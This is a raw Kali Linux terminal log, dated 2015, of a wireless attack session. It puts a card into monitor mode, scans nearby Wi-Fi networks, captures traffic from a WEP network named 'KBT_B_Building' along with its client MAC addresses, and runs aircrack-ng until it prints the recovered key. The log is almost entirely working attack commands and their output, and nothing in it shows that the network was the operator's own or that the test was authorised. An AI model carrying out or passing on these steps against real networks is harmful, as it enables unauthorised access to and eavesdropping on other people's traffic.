root@kali:~# airmon-ng

Interface	Chipset		Driver

wlan0		Atheros AR9485	ath9k - [phy0]

root@kali:~# airmon-ng start wlan0


Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
2980	NetworkManager
3086	wpa_supplicant
3947	dhclient


Interface	Chipset		Driver

wlan0		Atheros AR9485	ath9k - [phy0]
				(monitor mode enabled on mon0)

root@kali:~# airodump-ng mon0



 CH  3 ][ Elapsed: 1 min ][ 2015-07-28 13:17 ][ realtime sorting activated     
                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
 C8:D3:A3:25:24:02  -83      218     8149  154  11  54e. WEP  WEP    OPN  KBT_B
 EC:22:80:E4:A6:36   -1        0        0    0   1  -1                    <leng
 68:72:51:0E:39:A2  -91        7        0    0  13  54e. WPA  CCMP   PSK  UTech
 68:72:51:0E:36:FF  -95        2        0    0   8  54e. WPA  CCMP   PSK  UTech
                                                                                
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe      
                                                                                
 C8:D3:A3:25:24:02  4C:21:D0:D3:E0:7F   -1    1e- 0      0        1             
 C8:D3:A3:25:24:02  E4:2D:02:D9:68:A9   -1    1e- 0      0        2             
 C8:D3:A3:25:24:02  68:76:4F:92:9D:C3   -1    5e- 0      0       67             
 C8:D3:A3:25:24:02  00:EE:BD:8B:D2:93  -47   54e-36e     1     4998             
 C8:D3:A3:25:24:02  3C:91:57:16:F2:A4  -51    0 -54e     0       10             
 C8:D3:A3:25:24:02  30:75:12:0A:8F:DA  -65   18e-18e     0        9             
 C8:D3:A3:25:24:02  7C:1D:D9:39:66:E1  -83    0 - 6      0        2             
 C8:D3:A3:25:24:02  08:3E:8E:C9:D0:A5  -83   54e-36e     0       82             
 C8:D3:A3:25:24:02  E0:2C:B2:CE:DC:31  -85    1e- 1      0      345             
 C8:D3:A3:25:24:02  E0:CB:EE:63:21:34  -86    1e- 1     34       26  KBT_B_Build
 C8:D3:A3:25:24:02  C0:EE:FB:31:8B:D5  -91    0 - 1e     0        9  KBT_B_Build

[1]+  Stopped                 airodump-ng mon0

root@kali:~# airodump-ng -w KBT_B_Build-org -c 11 --bssid C8:D3:A3:25:24:02 mon0



 CH 11 ][ Elapsed: 1 min ][ 2015-07-28 13:21                                         
                                                                                                                                                     
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                     
 C8:D3:A3:25:24:02  -68 100      858    15544  154  11  54e. WEP  WEP    OPN  KBT_B_Building                                                         
                                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                           
                                                                                                                                                     
 C8:D3:A3:25:24:02  80:6C:1B:22:CB:BC  -87    0 - 6      0        1                                                                                   
 C8:D3:A3:25:24:02  E0:CB:EE:63:21:34   -1   12e- 0      0       25                                                                                   
 C8:D3:A3:25:24:02  14:99:E2:43:69:6E   -1    1e- 0      0       31                                                                                   
 C8:D3:A3:25:24:02  E0:2C:B2:C5:CB:77   -1   12e- 0      0      519                                                                                   
 C8:D3:A3:25:24:02  68:76:4F:92:9D:C3   -1   12e- 0      0      894                                                                                   
 C8:D3:A3:25:24:02  3C:91:57:16:F2:A4  -34    0 - 1      0       25                                                                                   
 C8:D3:A3:25:24:02  00:EE:BD:8B:D2:93  -40   36e- 6      0      113                                                                                   
 C8:D3:A3:25:24:02  08:3E:8E:C9:D0:A5  -64   54e- 1      2     1135                                                                                   
 C8:D3:A3:25:24:02  30:75:12:0A:8F:DA  -67   24e-36e     0      116                                                                                   
 C8:D3:A3:25:24:02  7C:1D:D9:39:66:E1  -79    2e- 6      0       11                                                                                   
 C8:D3:A3:25:24:02  4C:21:D0:D3:E0:7F  -80   24e- 1      0      313                                                                                   
 C8:D3:A3:25:24:02  E0:2C:B2:CE:DC:31  -84    1e- 1      0      768                                                                                   
 C8:D3:A3:25:24:02  44:91:DB:03:23:2C  -84    0 - 1      0        3                                                                                   
 C8:D3:A3:25:24:02  C0:EE:FB:31:8B:D5  -85    0 - 6      0      120  KBT_B_Building                                                                   
 C8:D3:A3:25:24:02  F0:5A:09:23:C9:47  -89    0 - 1      0        7                                                                                   
 C8:D3:A3:25:24:02  78:52:1A:08:77:97  -91    0 - 1      0      237                                                                                   

[2]+  Stopped                 airodump-ng -w KBT_B_Build-org -c 11 --bssid C8:D3:A3:25:24:02 mon0



root@kali:~# aircrack-ng KBT_B_Build-org-01.cap
Opening KBT_B_Build-org-01.cap
Read 24923 packets.

   #  BSSID              ESSID                     Encryption

   1  C8:D3:A3:25:24:02  KBT_B_Building            WEP (15558 IVs)

Choosing first network as target.

Opening KBT_B_Build-org-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 15558 ivs.


                                                                    Aircrack-ng 1.2 beta3


                                                    [00:00:00] Tested 22183 keys (got 12414 IVs)

   KB    depth   byte(vote)
    0   10/ 13   B8(16384) 82(16128) AB(16128) A8(15872) F6(15872) 7D(15616) C3(15616) D9(15616) E4(15616) 1B(15360) 98(15360) 
    1    0/  4   C7(18432) A1(17152) D2(17152) DC(16640) A7(16128) 6C(15872) 7C(15872) B5(15872) 2A(15616) 58(15616) 6E(15616) 
    2    0/  7   17(18688) EA(17920) B7(17664) BC(17664) E3(17152) 04(16896) 7A(16896) 02(16384) BD(16384) E6(16384) 8E(16128) 
    3    0/ 11   71(17920) 50(17152) 76(16640) 7F(16640) D0(16640) E9(16640) DE(16384) 73(16128) B3(16128) C5(16128) FA(16128) 
    4    5/  6   7A(16640) 5C(16384) C6(16128) 24(15872) C1(15872) 08(15616) 1B(15616) 7B(15616) 7F(15616) 97(15616) 1E(15360) 

                         KEY FOUND! [ AB:C7:17:71:7A ] 
	Decrypted correctly: 100%


root@kali:~# 


